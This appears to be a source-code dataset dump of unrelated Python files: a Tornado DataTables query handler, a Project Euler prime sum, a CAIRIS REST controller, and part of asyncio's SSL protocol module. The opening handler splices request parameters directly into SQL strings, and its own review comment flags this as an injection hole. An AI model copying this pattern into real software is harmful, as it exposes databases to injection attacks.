    def get(self):
        # Pagination parameters.
        start_param = self.get_argument("start", default=0, strip=False)
        length_param = self.get_argument("length", default=10, strip=False)
        print("page param:", length_param, start_param)

        name_param = self.get_argument("name", default=None, strip=False)
        type_param = self.get_argument("type", default=None, strip=False)
        stock_web = stock_web_dic.STOCK_WEB_DATA_MAP[name_param]

        # https://datatables.net/manual/server-side
        self.set_header('Content-Type', 'application/json;charset=UTF-8')

        order_by_column = []
        order_by_dir = []
        # Multi-column sort is supported (shift + left click in the UI).
        for item, val in self.request.arguments.items():
            # logging.info("item: %s, val: %s" % (item, val) )
            if str(item).startswith("order["):
                print("order:", item, ",val:", val[0])
            if str(item).startswith("order[") and str(item).endswith("[column]"):
                order_by_column.append(int(val[0]))
            if str(item).startswith("order[") and str(item).endswith("[dir]"):
                order_by_dir.append(val[0].decode("utf-8"))  # bytes -> str

        search_by_column = []
        search_by_data = []
        # Collect the per-column search values.
        for item, val in self.request.arguments.items():
            # logging.info("item: %s, val: %s" % (item, val))
            if str(item).startswith("columns[") and str(item).endswith("[search][value]"):
                logging.info("item: %s, val: %s" % (item, val))
                str_idx = item.replace("columns[", "").replace("][search][value]", "")
                int_idx = int(str_idx)
                # Extract the search string.
                str_val = val[0].decode("utf-8")
                if str_val != "":  # Non-empty search term.
                    search_by_column.append(stock_web.columns[int_idx])
                    search_by_data.append(val[0].decode("utf-8"))  # bytes -> str

        # NOTE(review): the search values below are interpolated directly
        # into the SQL text — this is vulnerable to SQL injection for any
        # user-controlled value and should be parameterized. Left unchanged
        # in this documentation-only pass; verify against the db.query API.
        search_sql = ""
        search_idx = 0
        logging.info(search_by_column)
        logging.info(search_by_data)
        for item in search_by_column:
            val = search_by_data[search_idx]
            logging.info("idx: %s, column: %s, value: %s " % (search_idx, item, val))
            # Build the WHERE clause.
            if search_idx == 0:
                search_sql = " WHERE `%s` = '%s' " % (item, val)
            else:
                search_sql = search_sql + " AND `%s` = '%s' " % (item, val)
            search_idx = search_idx + 1

        # print("stockWeb :", stock_web)
        order_by_sql = ""
        # Apply ordering (numeric sort via CAST to decimal).
        if len(order_by_column) != 0 and len(order_by_dir) != 0:
            order_by_sql = " ORDER BY "
            idx = 0
            for key in order_by_column:
                # Resolve the sort column and direction.
                col_tmp = stock_web.columns[key]
                dir_tmp = order_by_dir[idx]
                if idx != 0:
                    order_by_sql += " ,cast(`%s` as decimal) %s" % (col_tmp, dir_tmp)
                else:
                    order_by_sql += " cast(`%s` as decimal) %s" % (col_tmp, dir_tmp)
                idx += 1

        # Query the database.
        limit_sql = ""
        if int(length_param) > 0:
            limit_sql = " LIMIT %s , %s " % (start_param, length_param)
        sql = " SELECT * FROM `%s` %s %s %s " % (
            stock_web.table_name, search_sql, order_by_sql, limit_sql)
        count_sql = " SELECT count(1) as num FROM `%s` %s " % (stock_web.table_name, search_sql)
        logging.info("select sql : " + sql)
        logging.info("count sql : " + count_sql)

        stock_web_list = self.db.query(sql)
        for tmp_obj in (stock_web_list):
            logging.info("####################")
            if type_param == "editor":
                # DataTables Editor expects a DT_RowId per row; use the
                # first column's value.
                tmp_obj["DT_RowId"] = tmp_obj[stock_web.columns[0]]
            # logging.info(tmp_obj)
            try:
                # Inject the EastMoney link column for each row.
                logging.info("eastmoney_name : %s " % eastmoney_name)
                if eastmoney_name in stock_web.column_names:
                    tmp_idx = stock_web.column_names.index(eastmoney_name)
                    code_tmp = tmp_obj["code"]
                    # Prefix SH/SZ (Shanghai vs. Shenzhen) as required by
                    # the EastMoney research-report endpoint.
                    if code_tmp.startswith("6"):
                        code_tmp = "SH" + code_tmp
                    else:
                        code_tmp = "SZ" + code_tmp
                    tmp_url = WEB_EASTMONEY_URL % (tmp_obj["code"], tmp_obj["code"], code_tmp)
                    tmp_obj["eastmoney_url"] = tmp_url
                    logging.info(tmp_idx)
                    logging.info(tmp_obj["eastmoney_url"])
                    # logging.info(type(tmp_obj))
                    # tmp.column_names.insert(tmp_idx, eastmoney_name)
            except Exception as e:
                print("error :", e)

        stock_web_size = self.db.query(count_sql)
        logging.info("stockWebList size : %s " % stock_web_size)
        # DataTables server-side response envelope.
        obj = {
            "draw": 0,
            "recordsTotal": stock_web_size[0]["num"],
            "recordsFiltered": stock_web_size[0]["num"],
            "data": stock_web_list
        }
        # logging.info("####################")
        # logging.info(obj)
        self.write(json.dumps(obj))
| 40.338624 | 149 | 0.552859 |
f9d110588df578559f1e77355414cc3f41868188 | 342 | py | Python | ProjectEuler/Task010_SumPrimes.py | greendwin/puzzles | 5df1175f178d0c3e1ffa765160057d90e9da37cd | [
"MIT"
] | null | null | null | ProjectEuler/Task010_SumPrimes.py | greendwin/puzzles | 5df1175f178d0c3e1ffa765160057d90e9da37cd | [
"MIT"
] | null | null | null | ProjectEuler/Task010_SumPrimes.py | greendwin/puzzles | 5df1175f178d0c3e1ffa765160057d90e9da37cd | [
"MIT"
] | null | null | null |
PRIMES = []
def check_prime_inc(N):
for x in PRIMES:
if x * x > N:
break
if N % x == 0:
return
PRIMES.append(N)
return N
def iter_primes(N):
for x in xrange(2, N):
if check_prime_inc(x):
yield x
if __name__ == '__main__':
print sum(iter_primes(2000000))
| 14.25 | 35 | 0.511696 |
ab2dcbab8d79624c2225bc1f14182246dac3e864 | 10,041 | py | Python | cairis/controllers/ResponseController.py | RAIJ95/https-github.com-failys-cairis | 86601347ea016f4a3f90b6942093d63e91de5f74 | [
"Apache-2.0"
] | null | null | null | cairis/controllers/ResponseController.py | RAIJ95/https-github.com-failys-cairis | 86601347ea016f4a3f90b6942093d63e91de5f74 | [
"Apache-2.0"
] | null | null | null | cairis/controllers/ResponseController.py | RAIJ95/https-github.com-failys-cairis | 86601347ea016f4a3f90b6942093d63e91de5f74 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import httplib
from flask import session, request, make_response
from flask_restful import Resource
from flask_restful_swagger import swagger
from cairis.daemon.CairisHTTPError import MalformedJSONHTTPError, ARMHTTPError, ObjectNotFoundHTTPError
from cairis.data.ResponseDAO import ResponseDAO
from cairis.tools.JsonConverter import json_serialize
from cairis.tools.MessageDefinitions import ResponseMessage
from cairis.tools.ModelDefinitions import ResponseModel as SwaggerResponseModel
from cairis.tools.SessionValidator import get_session_id
__author__ = 'Robin Quetin'
class ResponsesAPI(Resource):
    """Collection endpoint for responses: list (GET) and create (POST)."""
    #region Swagger Doc
    @swagger.operation(
        notes='Get all responses',
        responseClass=SwaggerResponseModel.__name__,
        nickname='responses-get',
        parameters=[
            {
                "name": "session_id",
                "description": "The ID of the user's session",
                "required": False,
                "allowMultiple": False,
                "dataType": str.__name__,
                "paramType": "query"
            },
            {
                "name": "constraint_id",
                "description": "An ID used to filter the responses",
                "required": False,
                "default": -1,
                "allowMultiple": False,
                "dataType": int.__name__,
                "paramType": "query"
            }
        ],
        responseMessages=[
            {
                "code": httplib.BAD_REQUEST,
                "message": "The database connection was not properly set up"
            }
        ]
    )
    #endregion
    def get(self):
        """Return all responses, optionally filtered by ``constraint_id``."""
        session_id = get_session_id(session, request)
        constraint_id = request.args.get('constraint_id', -1)

        dao = ResponseDAO(session_id)
        responses = dao.get_responses(constraint_id)
        # Release the DAO's database resources, as the other handlers in
        # this module do.
        dao.close()

        resp = make_response(json_serialize(responses, session_id=session_id), httplib.OK)
        # Bug fix: the original assigned `resp.contenttype`, which is not a
        # Flask Response attribute and had no effect. Set the real header,
        # consistent with ResponseByNameAPI below.
        resp.headers['Content-type'] = 'application/json'
        return resp

    #region Swagger Docs
    @swagger.operation(
        notes='Add a new response',
        nickname='responses-post',
        parameters=[
            {
                "name": "body",
                "description": "The session ID and the serialized version of the asset to be updated",
                "required": True,
                "allowMultiple": False,
                "type": ResponseMessage.__name__,
                "paramType": "body"
            },
            {
                "name": "session_id",
                "description": "The ID of the user's session",
                "required": False,
                "allowMultiple": False,
                "dataType": str.__name__,
                "paramType": "query"
            }
        ],
        responseMessages=[
            {
                "code": httplib.BAD_REQUEST,
                "message": "The database connection was not properly set up"
            },
            {
                "code": MalformedJSONHTTPError.status_code,
                "message": MalformedJSONHTTPError.status
            },
            {
                "code": ARMHTTPError.status_code,
                "message": ARMHTTPError.status
            }
        ]
    )
    #endregion
    def post(self):
        """Create a response from the request body; return its new ID."""
        session_id = get_session_id(session, request)

        dao = ResponseDAO(session_id)
        response = dao.from_json(request)
        response_id = dao.add_response(response)
        # Release the DAO's database resources, matching the other handlers.
        dao.close()

        resp_dict = {'message': 'Response successfully added', 'response_id': response_id}
        resp = make_response(json_serialize(resp_dict), httplib.OK)
        # Same header fix as in get(): set a real response header.
        resp.headers['Content-type'] = 'application/json'
        return resp
class ResponseByNameAPI(Resource):
    """Single-response endpoint keyed by name: GET, PUT (update), DELETE."""
    #region Swagger Docs
    @swagger.operation(
        notes='Get a response by name',
        nickname='response-by-name-get',
        responseClass=SwaggerResponseModel.__name__,
        parameters=[
            {
                "name": "session_id",
                "description": "The ID of the user's session",
                "required": False,
                "allowMultiple": False,
                "dataType": str.__name__,
                "paramType": "query"
            }
        ],
        responseMessages=[
            {
                "code": httplib.BAD_REQUEST,
                "message": "The database connection was not properly set up"
            }
        ]
    )
    #endregion
    def get(self, name):
        """Return the response identified by *name* as JSON."""
        session_id = get_session_id(session, request)

        dao = ResponseDAO(session_id)
        found_response = dao.get_response_by_name(name)
        dao.close()

        resp = make_response(json_serialize(found_response, session_id=session_id), httplib.OK)
        resp.headers['Content-type'] = 'application/json'
        return resp

    # region Swagger Doc
    @swagger.operation(
        notes='Updates an existing response',
        nickname='response-by-name-put',
        parameters=[
            {
                "name": "body",
                "description": "The session ID and the serialized version of the asset to be updated",
                "required": True,
                "allowMultiple": False,
                "type": SwaggerResponseModel.__name__,
                "paramType": "body"
            },
            {
                "name": "session_id",
                "description": "The ID of the user's session",
                "required": False,
                "allowMultiple": False,
                "dataType": str.__name__,
                "paramType": "query"
            }
        ],
        responseMessages=[
            {
                'code': httplib.BAD_REQUEST,
                'message': 'One or more attributes are missing'
            },
            {
                'code': httplib.CONFLICT,
                'message': 'Some problems were found during the name check'
            },
            {
                'code': ObjectNotFoundHTTPError.status_code,
                'message': ObjectNotFoundHTTPError.status
            },
            {
                'code': ARMHTTPError.status_code,
                'message': ARMHTTPError.status
            }
        ]
    )
    # endregion
    def put(self, name):
        """Replace the response *name* with the one in the request body."""
        session_id = get_session_id(session, request)

        dao = ResponseDAO(session_id)
        new_response = dao.from_json(request)
        dao.update_response(name, new_response)
        dao.close()

        resp_dict = {'message': 'Response successfully updated'}
        resp = make_response(json_serialize(resp_dict), httplib.OK)
        resp.headers['Content-type'] = 'application/json'
        return resp

    # region Swagger Doc
    @swagger.operation(
        notes='Delete an existing response',
        nickname='response-name-delete',
        parameters=[
            {
                "name": "session_id",
                "description": "The ID of the user's session",
                "required": False,
                "allowMultiple": False,
                "dataType": str.__name__,
                "paramType": "query"
            }
        ],
        responseMessages=[
            {
                'code': httplib.BAD_REQUEST,
                'message': 'One or more attributes are missing'
            },
            {
                'code': httplib.CONFLICT,
                'message': 'Some problems were found during the name check'
            },
            {
                'code': ObjectNotFoundHTTPError.status_code,
                'message': ObjectNotFoundHTTPError.status
            },
            {
                'code': ARMHTTPError.status_code,
                'message': ARMHTTPError.status
            }
        ]
    )
    # endregion
    def delete(self, name):
        """Delete the response identified by *name*."""
        session_id = get_session_id(session, request)

        dao = ResponseDAO(session_id)
        dao.delete_response(name)
        dao.close()

        resp_dict = {'message': 'Response successfully deleted'}
        resp = make_response(json_serialize(resp_dict), httplib.OK)
        resp.headers['Content-type'] = 'application/json'
        return resp
class ResponseByNameGenerateAPI(Resource):
    """POST endpoint that generates a goal from the named response."""
    #region Swagger Docs
    @swagger.operation(
        notes='Generate goals based on a response name',
        nickname='response-by-name-generate_goal',
        responseClass=SwaggerResponseModel.__name__,
        parameters=[
            {
                "name": "session_id",
                "description": "The ID of the user's session",
                "required": False,
                "allowMultiple": False,
                "dataType": str.__name__,
                "paramType": "query"
            }
        ],
        responseMessages=[
            {
                "code": httplib.BAD_REQUEST,
                "message": "The database connection was not properly set up"
            }
        ]
    )
    #endregion
    def post(self, name):
        """Generate a goal for the response *name*; body content is unused."""
        session_id = get_session_id(session, request)

        dao = ResponseDAO(session_id)
        dao.generate_goal(name)
        dao.close()

        resp_dict = {'message': 'Goal successfully generated'}
        resp = make_response(json_serialize(resp_dict), httplib.OK)
        resp.headers['Content-type'] = 'application/json'
        return resp
| 33.922297 | 103 | 0.558012 |
15eb9c78443af7f81ff0a8305327572ac6749a94 | 26,951 | py | Python | Lib/asyncio/sslproto.py | Neeky/cpython-3.7.3 | 2b6d6a6132ad497e9ce70a3358468099dd407b2a | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/asyncio/sslproto.py | Neeky/cpython-3.7.3 | 2b6d6a6132ad497e9ce70a3358468099dd407b2a | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/asyncio/sslproto.py | Neeky/cpython-3.7.3 | 2b6d6a6132ad497e9ce70a3358468099dd407b2a | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | import collections
import warnings
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import base_events
from . import constants
from . import protocols
from . import transports
from .log import logger
def _create_transport_context(server_side, server_hostname):
if server_side:
raise ValueError('Server side SSL needs a valid SSLContext')
# Client side may pass ssl=True to use a default
# context; in that case the sslcontext passed is None.
# The default is secure for client connections.
# Python 3.4+: use up-to-date strong settings.
sslcontext = ssl.create_default_context()
if not server_hostname:
sslcontext.check_hostname = False
return sslcontext
# States of an _SSLPipe.
_UNWRAPPED = "UNWRAPPED"        # no TLS in effect; data passes through as-is
_DO_HANDSHAKE = "DO_HANDSHAKE"  # TLS handshake in progress
_WRAPPED = "WRAPPED"            # handshake done; records encrypted/decrypted
_SHUTDOWN = "SHUTDOWN"          # close_notify exchange in progress
class _SSLPipe(object):
    """An SSL "Pipe".

    An SSL pipe allows you to communicate with an SSL/TLS protocol instance
    through memory buffers. It can be used to implement a security layer for an
    existing connection where you don't have access to the connection's file
    descriptor, or for some reason you don't want to use it.

    An SSL pipe can be in "wrapped" and "unwrapped" mode. In unwrapped mode,
    data is passed through untransformed. In wrapped mode, application level
    data is encrypted to SSL record level data and vice versa. The SSL record
    level is the lowest level in the SSL protocol suite and is what travels
    as-is over the wire.

    An SslPipe initially is in "unwrapped" mode. To start SSL, call
    do_handshake(). To shutdown SSL again, call unwrap().
    """

    max_size = 256 * 1024   # Buffer size passed to read()

    def __init__(self, context, server_side, server_hostname=None):
        """
        The *context* argument specifies the ssl.SSLContext to use.

        The *server_side* argument indicates whether this is a server side or
        client side transport.

        The optional *server_hostname* argument can be used to specify the
        hostname you are connecting to. You may only specify this parameter if
        the _ssl module supports Server Name Indication (SNI).
        """
        self._context = context
        self._server_side = server_side
        self._server_hostname = server_hostname
        self._state = _UNWRAPPED
        # MemoryBIOs carry record-level bytes between us and the SSLObject:
        # _incoming feeds wire data in, _outgoing collects data to send.
        self._incoming = ssl.MemoryBIO()
        self._outgoing = ssl.MemoryBIO()
        self._sslobj = None
        self._need_ssldata = False
        self._handshake_cb = None
        self._shutdown_cb = None

    @property
    def context(self):
        """The SSL context passed to the constructor."""
        return self._context

    @property
    def ssl_object(self):
        """The internal ssl.SSLObject instance.

        Return None if the pipe is not wrapped.
        """
        return self._sslobj

    @property
    def need_ssldata(self):
        """Whether more record level data is needed to complete a handshake
        that is currently in progress."""
        return self._need_ssldata

    @property
    def wrapped(self):
        """
        Whether a security layer is currently in effect.

        Return False during handshake.
        """
        return self._state == _WRAPPED

    def do_handshake(self, callback=None):
        """Start the SSL handshake.

        Return a list of ssldata. A ssldata element is a list of buffers

        The optional *callback* argument can be used to install a callback that
        will be called when the handshake is complete. The callback will be
        called with None if successful, else an exception instance.
        """
        if self._state != _UNWRAPPED:
            raise RuntimeError('handshake in progress or completed')
        self._sslobj = self._context.wrap_bio(
            self._incoming, self._outgoing,
            server_side=self._server_side,
            server_hostname=self._server_hostname)
        self._state = _DO_HANDSHAKE
        self._handshake_cb = callback
        # Kick off the handshake: an empty feed drives the SSLObject and
        # collects the first outgoing handshake records.
        ssldata, appdata = self.feed_ssldata(b'', only_handshake=True)
        assert len(appdata) == 0
        return ssldata

    def shutdown(self, callback=None):
        """Start the SSL shutdown sequence.

        Return a list of ssldata. A ssldata element is a list of buffers

        The optional *callback* argument can be used to install a callback that
        will be called when the shutdown is complete. The callback will be
        called without arguments.
        """
        if self._state == _UNWRAPPED:
            raise RuntimeError('no security layer present')
        if self._state == _SHUTDOWN:
            raise RuntimeError('shutdown in progress')
        assert self._state in (_WRAPPED, _DO_HANDSHAKE)
        self._state = _SHUTDOWN
        self._shutdown_cb = callback
        ssldata, appdata = self.feed_ssldata(b'')
        # Only an empty "close_notify" marker may come back here.
        assert appdata == [] or appdata == [b'']
        return ssldata

    def feed_eof(self):
        """Send a potentially "ragged" EOF.

        This method will raise an SSL_ERROR_EOF exception if the EOF is
        unexpected.
        """
        self._incoming.write_eof()
        ssldata, appdata = self.feed_ssldata(b'')
        assert appdata == [] or appdata == [b'']

    def feed_ssldata(self, data, only_handshake=False):
        """Feed SSL record level data into the pipe.

        The data must be a bytes instance. It is OK to send an empty bytes
        instance. This can be used to get ssldata for a handshake initiated by
        this endpoint.

        Return a (ssldata, appdata) tuple. The ssldata element is a list of
        buffers containing SSL data that needs to be sent to the remote SSL.

        The appdata element is a list of buffers containing plaintext data that
        needs to be forwarded to the application. The appdata list may contain
        an empty buffer indicating an SSL "close_notify" alert. This alert must
        be acknowledged by calling shutdown().
        """
        if self._state == _UNWRAPPED:
            # If unwrapped, pass plaintext data straight through.
            if data:
                appdata = [data]
            else:
                appdata = []
            return ([], appdata)

        self._need_ssldata = False
        if data:
            self._incoming.write(data)

        ssldata = []
        appdata = []
        try:
            if self._state == _DO_HANDSHAKE:
                # Call do_handshake() until it doesn't raise anymore.
                self._sslobj.do_handshake()
                self._state = _WRAPPED
                if self._handshake_cb:
                    self._handshake_cb(None)
                if only_handshake:
                    return (ssldata, appdata)
                # Handshake done: execute the wrapped block

            if self._state == _WRAPPED:
                # Main state: read data from SSL until close_notify
                while True:
                    chunk = self._sslobj.read(self.max_size)
                    appdata.append(chunk)
                    if not chunk:  # close_notify
                        break

            elif self._state == _SHUTDOWN:
                # Call shutdown() until it doesn't raise anymore.
                self._sslobj.unwrap()
                self._sslobj = None
                self._state = _UNWRAPPED
                if self._shutdown_cb:
                    self._shutdown_cb()

            elif self._state == _UNWRAPPED:
                # Drain possible plaintext data after close_notify.
                appdata.append(self._incoming.read())
        except (ssl.SSLError, ssl.CertificateError) as exc:
            exc_errno = getattr(exc, 'errno', None)
            if exc_errno not in (
                    ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE,
                    ssl.SSL_ERROR_SYSCALL):
                # A real failure (not just "need more I/O"): report it to the
                # pending handshake callback, then propagate.
                if self._state == _DO_HANDSHAKE and self._handshake_cb:
                    self._handshake_cb(exc)
                raise
            self._need_ssldata = (exc_errno == ssl.SSL_ERROR_WANT_READ)

        # Check for record level data that needs to be sent back.
        # Happens for the initial handshake and renegotiations.
        if self._outgoing.pending:
            ssldata.append(self._outgoing.read())
        return (ssldata, appdata)

    def feed_appdata(self, data, offset=0):
        """Feed plaintext data into the pipe.

        Return an (ssldata, offset) tuple. The ssldata element is a list of
        buffers containing record level data that needs to be sent to the
        remote SSL instance. The offset is the number of plaintext bytes that
        were processed, which may be less than the length of data.

        NOTE: In case of short writes, this call MUST be retried with the SAME
        buffer passed into the *data* argument (i.e. the id() must be the
        same). This is an OpenSSL requirement. A further particularity is that
        a short write will always have offset == 0, because the _ssl module
        does not enable partial writes. And even though the offset is zero,
        there will still be encrypted data in ssldata.
        """
        assert 0 <= offset <= len(data)
        if self._state == _UNWRAPPED:
            # pass through data in unwrapped mode
            if offset < len(data):
                ssldata = [data[offset:]]
            else:
                ssldata = []
            return (ssldata, len(data))

        ssldata = []
        view = memoryview(data)
        while True:
            self._need_ssldata = False
            try:
                if offset < len(view):
                    offset += self._sslobj.write(view[offset:])
            except ssl.SSLError as exc:
                # It is not allowed to call write() after unwrap() until the
                # close_notify is acknowledged. We return the condition to the
                # caller as a short write.
                exc_errno = getattr(exc, 'errno', None)
                if exc.reason == 'PROTOCOL_IS_SHUTDOWN':
                    exc_errno = exc.errno = ssl.SSL_ERROR_WANT_READ
                if exc_errno not in (ssl.SSL_ERROR_WANT_READ,
                                     ssl.SSL_ERROR_WANT_WRITE,
                                     ssl.SSL_ERROR_SYSCALL):
                    raise
                self._need_ssldata = (exc_errno == ssl.SSL_ERROR_WANT_READ)

            # See if there's any record level data back for us.
            if self._outgoing.pending:
                ssldata.append(self._outgoing.read())
            if offset == len(view) or self._need_ssldata:
                break
        return (ssldata, offset)
class _SSLProtocolTransport(transports._FlowControlMixin,
                            transports.Transport):
    """Application-facing transport backed by an SSLProtocol.

    Application data handed to this transport is routed through the owning
    SSLProtocol (which encrypts it); flow-control and buffer queries are
    delegated to the underlying raw transport.
    """

    # sendfile() cannot transmit file bytes verbatim over TLS (they must be
    # encrypted first), so force the generic read/write fallback.
    _sendfile_compatible = constants._SendfileMode.FALLBACK

    def __init__(self, loop, ssl_protocol):
        self._loop = loop
        # SSLProtocol instance
        self._ssl_protocol = ssl_protocol
        self._closed = False

    def get_extra_info(self, name, default=None):
        """Get optional transport information."""
        return self._ssl_protocol._get_extra_info(name, default)

    def set_protocol(self, protocol):
        # Swap the application protocol; the SSL layer itself keeps running.
        self._ssl_protocol._set_app_protocol(protocol)

    def get_protocol(self):
        # Return the current application protocol object.
        return self._ssl_protocol._app_protocol

    def is_closing(self):
        return self._closed

    def close(self):
        """Close the transport.

        Buffered data will be flushed asynchronously. No more data
        will be received. After all buffered data is flushed, the
        protocol's connection_lost() method will (eventually) be called
        with None as its argument.
        """
        self._closed = True
        # Initiates an orderly TLS shutdown (close_notify) before the
        # underlying transport is torn down.
        self._ssl_protocol._start_shutdown()

    def __del__(self):
        # Warn if the transport is garbage-collected without an explicit
        # close() — mirrors the behaviour of plain socket transports.
        if not self._closed:
            warnings.warn(f"unclosed transport {self!r}", ResourceWarning,
                          source=self)
            self.close()

    def is_reading(self):
        tr = self._ssl_protocol._transport
        if tr is None:
            raise RuntimeError('SSL transport has not been initialized yet')
        return tr.is_reading()

    def pause_reading(self):
        """Pause the receiving end.

        No data will be passed to the protocol's data_received()
        method until resume_reading() is called.
        """
        self._ssl_protocol._transport.pause_reading()

    def resume_reading(self):
        """Resume the receiving end.

        Data received will once again be passed to the protocol's
        data_received() method.
        """
        self._ssl_protocol._transport.resume_reading()

    def set_write_buffer_limits(self, high=None, low=None):
        """Set the high- and low-water limits for write flow control.

        These two values control when to call the protocol's
        pause_writing() and resume_writing() methods. If specified,
        the low-water limit must be less than or equal to the
        high-water limit. Neither value can be negative.
        The defaults are implementation-specific. If only the
        high-water limit is given, the low-water limit defaults to an
        implementation-specific value less than or equal to the
        high-water limit. Setting high to zero forces low to zero as
        well, and causes pause_writing() to be called whenever the
        buffer becomes non-empty. Setting low to zero causes
        resume_writing() to be called only once the buffer is empty.
        Use of zero for either limit is generally sub-optimal as it
        reduces opportunities for doing I/O and computation
        concurrently.
        """
        self._ssl_protocol._transport.set_write_buffer_limits(high, low)

    def get_write_buffer_size(self):
        """Return the current size of the write buffer."""
        return self._ssl_protocol._transport.get_write_buffer_size()

    @property
    def _protocol_paused(self):
        # Required for sendfile fallback pause_writing/resume_writing logic
        return self._ssl_protocol._transport._protocol_paused

    def write(self, data):
        """Write some data bytes to the transport.

        This does not block; it buffers the data and arranges for it
        to be sent out asynchronously.
        """
        if not isinstance(data, (bytes, bytearray, memoryview)):
            raise TypeError(f"data: expecting a bytes-like instance, "
                            f"got {type(data).__name__}")
        if not data:
            return
        # Hand the plaintext to the SSL layer for encryption + queueing.
        self._ssl_protocol._write_appdata(data)

    def can_write_eof(self):
        """Return True if this transport supports write_eof(), False if not."""
        return False

    def abort(self):
        """Close the transport immediately.

        Buffered data will be lost. No more data will be received.
        The protocol's connection_lost() method will (eventually) be
        called with None as its argument.
        """
        self._ssl_protocol._abort()
        self._closed = True
class SSLProtocol(protocols.Protocol):
    """SSL protocol.

    Implementation of SSL on top of a socket using incoming and outgoing
    buffers which are ssl.MemoryBIO objects.
    """

    def __init__(self, loop, app_protocol, sslcontext, waiter,
                 server_side=False, server_hostname=None,
                 call_connection_made=True,
                 ssl_handshake_timeout=None):
        # *waiter* is a future that is resolved once the handshake finishes
        # (or fails); see _wakeup_waiter().
        if ssl is None:
            raise RuntimeError('stdlib ssl module not available')
        if ssl_handshake_timeout is None:
            ssl_handshake_timeout = constants.SSL_HANDSHAKE_TIMEOUT
        elif ssl_handshake_timeout <= 0:
            raise ValueError(
                f"ssl_handshake_timeout should be a positive number, "
                f"got {ssl_handshake_timeout}")
        if not sslcontext:
            # No context supplied: create a default one for this side.
            sslcontext = _create_transport_context(
                server_side, server_hostname)
        self._server_side = server_side
        # server_hostname is only meaningful for client connections
        # (used for SNI and certificate matching).
        if server_hostname and not server_side:
            self._server_hostname = server_hostname
        else:
            self._server_hostname = None
        self._sslcontext = sslcontext
        # SSL-specific extra info. More info are set when the handshake
        # completes.
        self._extra = dict(sslcontext=sslcontext)
        # App data write buffering
        self._write_backlog = collections.deque()
        self._write_buffer_size = 0
        self._waiter = waiter
        self._loop = loop
        self._set_app_protocol(app_protocol)
        self._app_transport = _SSLProtocolTransport(self._loop, self)
        # _SSLPipe instance (None until the connection is made)
        self._sslpipe = None
        self._session_established = False
        self._in_handshake = False
        self._in_shutdown = False
        # transport, ex: SelectorSocketTransport
        self._transport = None
        self._call_connection_made = call_connection_made
        self._ssl_handshake_timeout = ssl_handshake_timeout

    def _set_app_protocol(self, app_protocol):
        # Record whether the app protocol uses the buffered-protocol API,
        # which changes how decrypted data is delivered in data_received().
        self._app_protocol = app_protocol
        self._app_protocol_is_buffer = \
            isinstance(app_protocol, protocols.BufferedProtocol)

    def _wakeup_waiter(self, exc=None):
        # Resolve the handshake waiter exactly once; a cancelled waiter is
        # left alone.  Called on handshake completion, EOF, or teardown.
        if self._waiter is None:
            return
        if not self._waiter.cancelled():
            if exc is not None:
                self._waiter.set_exception(exc)
            else:
                self._waiter.set_result(None)
        self._waiter = None

    def connection_made(self, transport):
        """Called when the low-level connection is made.

        Start the SSL handshake.
        """
        self._transport = transport
        self._sslpipe = _SSLPipe(self._sslcontext,
                                 self._server_side,
                                 self._server_hostname)
        self._start_handshake()

    def connection_lost(self, exc):
        """Called when the low-level connection is lost or closed.

        The argument is an exception object or None (the latter
        meaning a regular EOF is received or the connection was
        aborted or closed).
        """
        if self._session_established:
            self._session_established = False
            self._loop.call_soon(self._app_protocol.connection_lost, exc)
        else:
            # Most likely an exception occurred while in SSL handshake.
            # Just mark the app transport as closed so that its __del__
            # doesn't complain.
            if self._app_transport is not None:
                self._app_transport._closed = True
        self._transport = None
        self._app_transport = None
        # Cancel a still-pending handshake timeout (getattr guards against
        # connection_lost() arriving before _start_handshake() ran).
        if getattr(self, '_handshake_timeout_handle', None):
            self._handshake_timeout_handle.cancel()
        self._wakeup_waiter(exc)
        self._app_protocol = None
        self._sslpipe = None

    def pause_writing(self):
        """Called when the low-level transport's buffer goes over
        the high-water mark.
        """
        self._app_protocol.pause_writing()

    def resume_writing(self):
        """Called when the low-level transport's buffer drains below
        the low-water mark.
        """
        self._app_protocol.resume_writing()

    def data_received(self, data):
        """Called when some SSL data is received.

        The argument is a bytes object.
        """
        if self._sslpipe is None:
            # transport closing, sslpipe is destroyed
            return
        try:
            # Feed ciphertext into the pipe; get back record-level data to
            # send (ssldata) and decrypted application data (appdata).
            ssldata, appdata = self._sslpipe.feed_ssldata(data)
        except Exception as e:
            self._fatal_error(e, 'SSL error in data received')
            return
        for chunk in ssldata:
            self._transport.write(chunk)
        for chunk in appdata:
            if chunk:
                try:
                    if self._app_protocol_is_buffer:
                        protocols._feed_data_to_buffered_proto(
                            self._app_protocol, chunk)
                    else:
                        self._app_protocol.data_received(chunk)
                except Exception as ex:
                    self._fatal_error(
                        ex, 'application protocol failed to receive SSL data')
                    return
            else:
                # An empty chunk signals close_notify from the peer:
                # begin our side of the orderly shutdown.
                self._start_shutdown()
                break

    def eof_received(self):
        """Called when the other end of the low-level stream
        is half-closed.

        If this returns a false value (including None), the transport
        will close itself. If it returns a true value, closing the
        transport is up to the protocol.
        """
        try:
            if self._loop.get_debug():
                logger.debug("%r received EOF", self)
            # EOF during the handshake means the peer went away.
            self._wakeup_waiter(ConnectionResetError)
            if not self._in_handshake:
                keep_open = self._app_protocol.eof_received()
                if keep_open:
                    logger.warning('returning true from eof_received() '
                                   'has no effect when using ssl')
        finally:
            self._transport.close()

    def _get_extra_info(self, name, default=None):
        # Answer from SSL-level extras first, then fall back to the
        # underlying transport.
        if name in self._extra:
            return self._extra[name]
        elif self._transport is not None:
            return self._transport.get_extra_info(name, default)
        else:
            return default

    def _start_shutdown(self):
        # Begin an orderly TLS shutdown; abort instead if the handshake
        # never completed.
        if self._in_shutdown:
            return
        if self._in_handshake:
            self._abort()
        else:
            self._in_shutdown = True
